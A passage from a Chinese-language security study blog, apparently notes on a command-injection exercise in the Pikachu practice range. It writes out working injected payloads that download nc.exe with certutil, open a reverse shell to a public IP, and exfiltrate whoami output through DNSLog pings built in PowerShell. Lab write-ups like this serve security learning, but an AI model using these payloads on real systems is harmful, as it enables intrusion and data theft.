</li>
</ul>
</li>
<li><p>使用nc连接pikachu靶场ping题：</p>
<p>1.获取nc.exe到路径C:\\</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0.0.0.0 | certutil -urlcache -split -f https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/tool/nc.exe C:\\nc.exe</span><br></pre></td></tr></table></figure>

<p>2.执行nc进行反向连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0.0.0.0 | C:\\nc.exe -e cmd 8.155.11.131 5566</span><br></pre></td></tr></table></figure>

<p>3.公网linux监听自身5566端口获得cmd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 5566</span><br></pre></td></tr></table></figure>

<p>注：服务器连接不上，需要配置防火墙入站规则</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251430425.png"></p>
</li>
<li><p>防火墙：入站规则，出站规则</p>
<p>防火墙一般默认入站严格，出站宽松</p>
</li>
</ul>
<h2 id="4-实际案例-2：防火墙组合数据不回显-ICMP-带外查询-Dnslog"><a href="#4-实际案例-2：防火墙组合数据不回显-ICMP-带外查询-Dnslog" class="headerlink" title="4. 实际案例 2：防火墙组合数据不回显-ICMP 带外查询 Dnslog"></a>4. 实际案例 2：防火墙组合数据不回显-ICMP 带外查询 Dnslog</h2><ul>
<li><p>漏洞有，但数据<strong>不回显</strong>：</p>
<ul>
<li><p>方法1：反弹shell</p>
</li>
<li><p>方法2：带外查询:看不到结果，主动带出来</p>
<ul>
<li><p>平台：<a target="_blank" rel="noopener" href="http://www.dnslog.cn/">DNSLog 平台 — DNSLog Platform</a></p>
</li>
<li><p>使用：获取一个SubDomain地址，尝试去ping，ping通了网页会有一个记录，表示命令执行成功。防火墙对此无影响</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping zqsx0z.dnslog.cn</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\14232\AppData\Roaming\Typora\typora-user-images\image-20241025191257501.png" alt="image-20241025191257501"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping whoami.zqsx0z.dnslog.cn</span><br></pre></td></tr></table></figure>

<p>问题：只输出了字符串whoami，并没有执行whoami命令</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251912607.png"> </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping `whoami`.zqsx0z.dnslog.cn</span><br></pre></td></tr></table></figure>

<p>问题：windows的cmd命令识别不了&#96;&#96;,这个符号是linux系统特有的</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251916671.png"></p>
<p>并且，cmd不能带入执行whoami</p>
<p>办法：采用powershell赋值变量进行执行</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251926207.png"></p>
<p>$x&#x3D;whoami;$y&#x3D;’.am84eg.dnslog.cn’</p>
<p>$z&#x3D;$x+$y</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251933057.png"></p>
<p>问题：地址里有一个 \ 导致找不到</p>
<p>方法：使用replace()替换 \ </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$z=$z.replace(&#x27;\&#x27;,&#x27;xxx&#x27;)</span><br></pre></td></tr></table></figure>

<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251939454.png"></p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251943381.png"></p>
<p>最终构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 | powershell $x=whoami;$x=$x.replace(&#x27;\&#x27;,&#x27;xxx&#x27;);$y=&#x27;.blefo9.dnslog.cn&#x27;;$z=$x+$y;ping $z</span><br></pre></td></tr></table></figure>

<p>cmd无法同时执行ping和whoami，用powershell变量赋值，把whoami执行结果给变量，结果带有“\”导致ping无法执行，需替换</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410252107265.png"></p>
<p>至此，命令执行成功，带出回显</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2017 十二亿七千光年
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
